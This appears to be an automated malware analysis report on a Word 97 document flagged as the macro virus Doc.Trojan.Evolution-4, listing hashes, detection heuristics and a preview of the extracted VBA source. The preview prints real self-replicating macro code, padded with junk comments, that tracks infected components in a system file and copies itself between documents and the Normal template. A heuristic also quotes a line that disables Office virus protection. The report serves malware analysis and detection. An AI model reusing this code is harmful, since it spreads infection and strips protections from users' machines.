Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7bc35627d29881b1…

MALICIOUS

Office (OLE)

376.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e3843747d4a128026e6cc3d786e56e79 SHA-1: a26e7647ed839f9fea9b34193b7367bb4a32e5cc SHA-256: 7bc35627d29881b1a993129fb6968b8549b289aa179a65c26bf09b429bca2202
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of legacy macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code automatically. ClamAV detections further confirm its malicious nature, classifying it as Doc.Trojan.Evolution-4. The extensive size of the VBA macro source suggests a complex payload, likely designed for execution upon document interaction.

Heuristics 6

  • ClamAV: Doc.Trojan.Evolution-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Evolution-4
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 700408 bytes
SHA-256: 82cddaf3b28b90f0c09cc732e8c9aa572c01ae882648280b5100f59bc6678c73
Detection
ClamAV: Doc.Trojan.Evolution-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FHCITRCD"
 '2319651
 'A
 '10:43:11
 'HOME
 '12-13-1999
 '17:19:55
 'Ditry PC
 'Pima County Library
 '12-13-1999
 'A
 '12-13-1999
 '11-19-1999
 'DP
 '17:19:55
 '10:43:11
Public Source As String
 '10:43:11
 '17:19:55
 'Ditry PC
 'Home Office 97
 'DP
 '11-22-1999
 '10:43:11
 '11-10-1999
 '12-13-1999
 '3444285
 '10:43:11
 'HOME
 '8522026
 'A
 '2450732
Public ByeMacro As String
 'Ditry PC
 '11-22-1999
 '10:43:11
 'Home Office 97
 '5990278
 '8253791
 '12-13-1999
 'PCL
 'Ditry PC
 '7991627
 'Ditry PC
 'HOME
 '3454443
 '17:19:55
 '10:43:11
Public Hostinf As Boolean
 '6117274
 'Avert
 '12-13-1999
 'Home Office 97
 '795698
 '17:19:55
 'DP
 'Pima County Library
 '12-13-1999
 'A
 '12-13-1999
 '18:53:43
 'Ditry PC
 '6856834
 '2295135
Public FileInf As Boolean
 '3302932
 'Avert
 'DP
 '7716587
 'DP
 '17:19:55
 '12-13-1999
 'PCL
 '12-13-1999
 'A
 'Ditry PC
 'HOME
 '12-13-1999
 'A
 '10:43:11
Public FExport As String
 '767097
 '11-22-1999
 'Ditry PC
 '18:53:43
 '12-13-1999
 '17:19:55
 '12-13-1999
 '4215783
 '10:43:11
 '5459878
 '12-13-1999
 '2780085
 '12-13-1999
 'A
 'Ditry PC
Public PMExport As String
 '10:43:11
 '17:19:55
 '3044854
 'Home Office 97
 '8497511
 'Avert
 'Ditry PC
 '5350576
 'DP
 '9130505
 'DP
 'HOME
 '12-13-1999
 '11-22-1999
 '6219754
Public PMFile_Yes As Boolean
 '8624507
 '11-22-1999
 '10:43:11
 '11-19-1999
 '1778979
 '11-22-1999
 '12-13-1999
 '7755328
 '10:43:11
 '912536
 'Ditry PC
 'Home Office 97
 '8751503
 '1920333
 'DP
Public Ex_Yes As Boolean
 '10:43:11
 'A
 '10:43:11
 'Home Office 97
 'DP
 'A
 '12-13-1999
 '13:12:27
 'Ditry PC
 '11-22-1999
 'DP
 '18:53:43
 '10:43:11
 '11-22-1999
 'DP
Public Filename As String
 '12-13-1999
 '11-22-1999
 '12-13-1999
 '18:53:43
 '10:43:11
 '9519665
 'DP
 'Pima County Library
 'Ditry PC
 'A
 'DP
 'HOME
 'DP
 '17:19:55
 '9632303
Public FileID As String
 'Ditry PC
 'Avert
 '10:43:11
 'Home Office 97
 '10:43:11
 '5332882
 '10:43:11
 'Pima County Library
 '10:43:11
 'Avert
 '12-13-1999
 'Home Office 97
 '12-13-1999
 '6598756
 'Ditry PC
Public FileID2 As String
 '3688006
 'Avert
 '12-13-1999
 '18:53:43
 '10:43:11
 '17:19:55
 '10:43:11
 '11-10-1999
 '10:43:11
 '1662255
 'Ditry PC
 'HOME
 '4953880
 '7114912
 '7231637
Public Virname As String
 'Ditry PC
 '11-22-1999
 'Ditry PC
 '18:53:43
 'DP
 '17:19:55
 'Ditry PC
 '13:12:27
 '10:43:11
 '17:19:55
 'DP
 '11-19-1999
 'DP
 '11-22-1999
 'Ditry PC
Public FC_There As Boolean
 '10:43:11
 'A
 '12-13-1999
 'Home Office 97
 '12-13-1999
 '11-22-1999
 '10:43:11
 '13:12:27
 'DP
 '7241908
 '2037057
 'HOME
 '3171850
 'Avert
 '5576602
Public FO_There As Boolean
 'DP
 '396380
 'Ditry PC
 '11-19-1999
 '10:43:11
 '5722042
 'Ditry PC
 '7882324
 'DP
 'Avert
 '10:43:11
 '18:53:43
 '5703598
 'A
 'DP
Public FP_There As Boolean
 '3429928
 '11-22-1999
 '12-13-1999
 'Home Office 97
 'Ditry PC
 'A
 'DP
 'PCL
 'DP
 '17:19:55
 '1025175
 '11-19-1999
 '10:43:11
 'Avert
 'Ditry PC
Public FN_There As Boolean
 '7358633
 'A
 '10:43:11
 'HOME
 'DP
 '3059211
 '12-13-1999
 '5608654
 'Ditry PC
 'A
 '12-13-1999
 '5442916
 'DP
 '17:19:55
 '10:43:11
Public FS_There As Boolean
 '10:43:11
 '17:19:55
 '10:43:11
 '7974664
 'DP
 '11-22-1999
 'Ditry PC
 '11-10-1999
 '10:43:11
 '2051415
 '10:43:11
 'HOME
 '640101
 '17:19:55
 '10:43:11
Public FSA_There As Boolean
 'DP
 '11-22-1999
 '10:43:11
 'HOME
 '10:43:11
 '17:19:55
 '10:43:11
 '11-10-1999
 '1905975
 'A
 '12-13-1999
 'HOME
 '12-13-1999
 '8249705
 'DP
Public VrusName As String
 '10:43:11
 'Avert
 '9501222
 'Home Office 97
 '10:43:11
 'Avert
 'DP
 'Pima County Library
 '5834680
 '7217393
 '10:43:11
 '18:53:43
 'Ditry PC
 '9622146
 'Ditry PC
Public Armor As Boolean
 '1156257
 '17:19:55
 'Ditry PC
 '18:53:43
 '7485629
 'A
 '17378
 'PCL
 'DP
 'Avert
 '8235347
 '6577708
 '10:43:11
 '17:19:55
 '10:43:11
Function Source_Check()
 '3298846
 '17:19:55
 '12-13-1999
 '379418
 '2422131
 'A
 '12-13-1999
 '3203901
 '12-13-1999
 '9749142
 'Ditry PC
 'Home Office 97
 'DP
 'A
 'DP
On Error Resume Next
 '12-13-1999
 'Avert
 '12-13-1999
 'HOME
 'Ditry PC
 '17:19:55
 'DP
 '11-10-1999
 'Ditry PC
 'Avert
 '4310728
 '18:53:43
 '9890381
 '11-22-1999
 'Ditry PC
Application.EnableCancelKey = wdCancelDisabled
 '10:43:11
 'A
 'Ditry PC
 '11-19-1999
 '3561010
 'A
 '4695802
 '11-10-1999
 '7100555
 '11-22-1999
 '10:43:11
 '5180752
 'DP
 'A
 'Ditry PC
If MacroContainer = NormalTemplate Then Source = "Host":  Exit Function
 'DP
 '6078515
 '10:43:11
 'Home Office 97
 'DP
 '11-22-1999
 '7227551
 '9537359
 'DP
 'A
 'Ditry PC
 '6446626
 'DP
 '888021
 'Ditry PC
If MacroContainer = ActiveDocument Then Source = "File"
 '12-13-1999
 '17:19:55
 '9763385
 '11-19-1999
 '12-13-1999
 '629943
 '1029261
 '13:12:27
 '12-13-1999
 'Avert
 'Ditry PC
 'Home Office 97
 '6092758
 '6959315
 'DP
End Function
 '10:43:11
 '9491064
 '8108351
 'HOME
 'DP
 'A
 '4437724
 '2200190
 '6969473
 '11-22-1999
 'DP
 '11-19-1999
 '12-13-1999
 'A
 '4826884
Function Self_Recognition()
 'DP
 '4685644
 '12-13-1999
 'HOME
 '12-13-1999
 '11-22-1999
 '10:43:11
 'Pima County Library
 '9374225
 '8094107
 '10:43:11
 'HOME
 '10:43:11
 '1895817
 'DP
On Error Resume Next
 'DP
 'Avert
 '8239433
 'Home Office 97
 '10:43:11
 '11-22-1999
 'DP
 '11-10-1999
 '2032971
 '17:19:55
 'Ditry PC
 'HOME
 '10:43:11
 'A
 '6842477
Application.EnableCancelKey = wdCancelDisabled
 'DP
 '11-22-1999
 '10:43:11
 'HOME
 'Ditry PC
 '11-22-1999
 '513105
 'PCL
 '12-13-1999
 '11-22-1999
 '12-13-1999
 'Home Office 97
 'Ditry PC
 'Avert
 '2295135
Open "C:\windows\system\vnames.cpl" For Input As #1
 '3302932
 '4554562
 'DP
 '8748898
 'DP
 'Avert
 '12-13-1999
 '1188308
 '12-13-1999
 'Avert
 'Ditry PC
 '1153652
 '12-13-1999
 '9364068
 '10:43:11
Do
 '767097
 '17:19:55
 'Ditry PC
 '18:53:43
 '12-13-1999
 'A
 '12-13-1999
 'PCL
 '10:43:11
 '17:19:55
 '12-13-1999
 '11-19-1999
 '12-13-1999
 '11-22-1999
 'Ditry PC
Line Input #1, Virname
 '10:43:11
 '5435363
 '3044854
 'Home Office 97
 '8497511
 '7967111
 'Ditry PC
 '2327186
 'DP
 'A
 'DP
 '11-19-1999
 '12-13-1999
 '2280891
 '6219754
For Z = 1 To ActiveDocument.VBProject.VBComponents.Count
 '8624507
 'Avert
 '10:43:11
 '18:53:43
 '1778979
 '7086311
 '12-13-1999
 '13:12:27
 '10:43:11
 '11-22-1999
 'Ditry PC
 '18:53:43
 '8751503
 '6701237
 'DP
               If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then
 '10:43:11
 '9359982
 '10:43:11
 '1280648
 'DP
 '3288688
 '12-13-1999
 'PCL
 'Ditry PC
 'Avert
 'Ditry PC
 'HOME
 '12-13-1999
 '11-22-1999
 'Ditry PC
    If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost
 'DP
 '6828233
 'DP
 'HOME
 '12-13-1999
 '11-22-1999
 'Ditry PC
 '11-10-1999
 '2241685
 '3030610
 'Ditry PC
 '18:53:43
 '10:43:11
 'Avert
 'Ditry PC
    If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname
 '5912312
 '5566445
 '12-13-1999
 'HOME
 '12-13-1999
 'A
 '12-13-1999
 '13:12:27
 '10:43:11
 'A
 'DP
 '11-19-1999
 '8702139
 'Avert
 'DP
newname:
 'DP
 '17:19:55
 '3511646
 'Home Office 97
 '12-13-1999
 'A
 '6301472
 '13:12:27
 'DP
 'Avert
 '10:43:11
 'HOME
 'Ditry PC
 '17:19:55
 '2114689
Close #1
 'Ditry PC
 '11-22-1999
 '3380564
 '18:53:43
 'Ditry PC
 'A
 'Ditry PC
 'PCL
 '8444061
 '3292774
 'DP
 'HOME
 'DP
 '4300570
 '12-13-1999
Open "C:\windows\system\vnames.cpl" For Append As #1
 'Ditry PC
 '5562359
 '10:43:11
 '11-19-1999
 '12-13-1999
 '11-22-1999
 '10:43:11
 '2454182
 '12-13-1999
 '17:19:55
 '10:43:11
 '11-19-1999
 '6170390
 'Avert
 '7178187
    Print #1, ActiveDocument.VBProject.VBComponents(Z).Name
 '2503849
 '17:19:55
 '12-13-1999
 'HOME
 '10:43:11
 '17:19:55
 '12-13-1999
 'PCL
 'Ditry PC
 '17:19:55
 '10:43:11
 'HOME
 'Ditry PC
 'A
 'DP
      Close #1
 '9841017
 '11-22-1999
 'Ditry PC
 'Home Office 97
 '10:43:11
 '11-22-1999
 '10:43:11
 '11-10-1999
 '12-13-1999
 '17:19:55
 '8833221
 'HOME
 '10:43:11
 '17:19:55
 '12-13-1999
        End If
 'Ditry PC
 'A
 'DP
 '2157363
 '5031512
 '11-22-1999
 'Ditry PC
 '13:12:27
 '12-13-1999
 'A
 '12-13-1999
 'HOME
 '12-13-1999
 'Avert
 'Ditry PC
    If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost
 '4646438
 'A
 '12-13-1999
 'HOME
 '10:43:11
 'Avert
 '12-13-1999
 'Pima County Library
 '12-13-1999
 'Avert
 'Ditry PC
 '4586631
 '12-13-1999
 'A
 '12-13-1999
lost:
 '12-13-1999
 '2153895
 '10:43:11
 'HOME
 '12-13-1999
 'Avert
 'DP
 '11-10-1999
 '10:43:11
 'Avert
 'Ditry PC
 '5725509
 '12-13-1999
 'Avert
 '10:43:11
Next Z
 'Ditry PC
 'Avert
 '12-13-1999
 '18:53:43
 'Ditry PC
 'Avert
 '10:43:11
 'PCL
 '12-13-1999
 '11-22-1999
 '12-13-1999
 '18:53:43
 '848815
 '9232986
 '10:43:11
Loop Until EOF(1)
 'DP
 'A
 '7436265
 '11-19-1999
 'DP
 '11-22-1999
 'Ditry PC
 'PCL
 '975811
 '4296484
 '10:43:11
 '18:53:43
 'Ditry PC
 'Avert
 '12-13-1999
Close #1
 '12-13-1999
 'Avert
 'Ditry PC
 '18:53:43
 'Ditry PC
 '11-22-1999
 'DP
 '11-10-1999
 '10:43:11
 '17:19:55
 'DP
 'HOME
 'DP
 '11-22-1999
 'DP
Dim Lib
 '1106893
 'A
 'Ditry PC
 'HOME
 'DP
 '17:19:55
 'DP
 'PCL
 '4904516
 'Avert
 '5785316
 '9523132
 '9968013
 '11-22-1999
 'DP
Open "C:\windows\system\vnames.cpl" For Input As #1
 '6043394
 '17:19:55
 '99096
 '11-19-1999
 '10:43:11
 'Avert
 '10:43:11
 'PCL
 '10:43:11
 '11-22-1999
 '10:43:11
 '18:53:43
 'Ditry PC
 '17:19:55
 '12-13-1999
Do
 'Ditry PC
 'A
 '6039308
 'Home Office 97
 '12-13-1999
 'Avert
 'Ditry PC
 '11-10-1999
 '10:43:11
 'Avert
 '10:43:11
 '11-19-1999
 'Ditry PC
 '11-22-1999
 '7305183
Line Input #1, Virname
 '9582939
 'A
 '10:43:11
 'HOME
 'Ditry PC
 'Avert
 'DP
 'Pima County Library
 '10:43:11
 'A
 'Ditry PC
 'HOME
 'DP
 '4558648
 '1233889
For Lib = 1 To NormalTemplate.VBProject.VBComponents.Count
 '10:43:11
 '5693441
 'Ditry PC
 '11-19-1999
 '4519442
 '8098193
 '8575143
 'PCL
 '10:43:11
 '17:19:55
 '12-13-1999
 'HOME
 '10:43:11
 'Avert
 '12-13-1999
    If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip
 'Ditry PC
 'Avert
 'DP
 'HOME
 '10:43:11
 '11-22-1999
 '10:43:11
 '3593061
 'Ditry PC
 '17:19:55
 'DP
 '11-19-1999
 'DP
 '17:19:55
 '12-13-1999
    If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck
 '10:43:11
 '8225189
 '4777520
 '1411730
 '12-13-1999
 'A
 'Ditry PC
 'Pima County Library
 'Ditry PC
 '5951519
 '10:43:11
 '6991383
 '12-13-1999
 '11-22-1999
 '12-13-1999
skip:
 'Ditry PC
 '11-22-1999
 '10:43:11
 'Home Office 97
 'Ditry PC
 'Avert
 '9709936
 '3334983
 '10:43:11
 'A
 '2372767
 '6733305
 '12-13-1999
 '3546766
 '7051191
Next Lib
 'DP
 '11-22-1999
 'DP
 'Home Office 97
 'DP
 '11-22-1999
 '2499763
 '13:12:27
 '10:43:11
 'A
 '10:43:11
 '3062678
 '12-13-1999
 '7090397
 'Ditry PC
Loop Until EOF(1)
 'Ditry PC
 'A
 'DP
 '5594427
 'DP
 '11-22-1999
 '6297386
 '11-10-1999
 '12-13-1999
 '9105990
 '10:43:11
 'HOME
 'Ditry PC
 'Avert
 '8317065
doccheck:
 'DP
 '17:19:55
 '12-13-1999
 '11-19-1999
 'DP
 '17:19:55
 'DP
 'PCL
 '7309269
 '17:19:55
 '10:43:11
 'HOME
 '3765638
 'A
 'Ditry PC
Close #1
 '3507560
 'Avert
 'Ditry PC
 '789008
 'DP
 'Avert
 '10:43:11
 '11-10-1999
 'DP
 'Avert
 '10:43:11
 '11-19-1999
 '10:43:11
 '3161692
 '12-13-1999
Open "C:\windows\system\vnames.cpl" For Input As #1
 '10:43:11
 '11-22-1999
 'DP
 'HOME
 'DP
 '17:19:55
 '12-13-1999
 '6899043
 '5035598
 '17:19:55
 '4773434
 '11-19-1999
 '12-13-1999
 '17:19:55
 '12-13-1999
Do
 'Ditry PC
 '17:19:55
 'DP
 '11-19-1999
 '3638642
 '4427566
 '12-13-1999
 'Pima County Library
 'Ditry PC
 '11-22-1999
 'DP
 'Home Office 97
 'DP
 'A
 '12-13-1999
…